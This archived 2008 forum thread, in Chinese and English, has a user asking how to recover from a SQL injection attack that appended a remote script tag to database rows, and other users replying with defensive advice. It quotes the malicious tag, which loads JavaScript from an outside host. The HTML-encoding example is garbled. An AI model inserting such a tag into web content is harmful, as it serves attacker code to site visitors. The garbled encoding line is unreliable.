This topic has been archived. It cannot be replied.
-
工作学习 / 学科技术讨论 / 着急!!!SQL SERVER被HACK了, 有几个TABLE的数据后面被人加入<script src=http://www.bios47.com/b.js></script>,当web page调入数据时页面传输很慢,而且会后ALARM, 可能会ATTACK你的机器. 有没有DX遇到过这个问题? 怎么防止被黑呢????谢谢大家,给点提示吧
-shinning(dudu);
2008-6-26
(#4523805@0)
-
Perhaps it is SQL inject, 你需要至少做两件事情,1、给Server打最新的补丁;2、过滤所有user input, HTML input field value, including hidden fields. 用POST 不要用GET等等。。。
-canadiantire(轮胎 - Bona fide Crm);
2008-6-26
(#4523808@0)
-
thanks
-shinning(dudu);
2008-6-26
(#4523845@0)
-
Did you use ad-hoc sql query or stored proc? Better use stored proc
-newdriger(P0kerFan);
2008-6-26
(#4523950@0)
-
It’s not database problem. It’s your web application problem.In order to prevent from script attaching, you should use HTML encoding (using special characters combinations for HTML and script tags). For example, use < for < use < for >. By this way, It shows tags but not interprets content as script codes or html content.
-deep_blue(BLUE);
2008-6-26
{288}
(#4524026@0)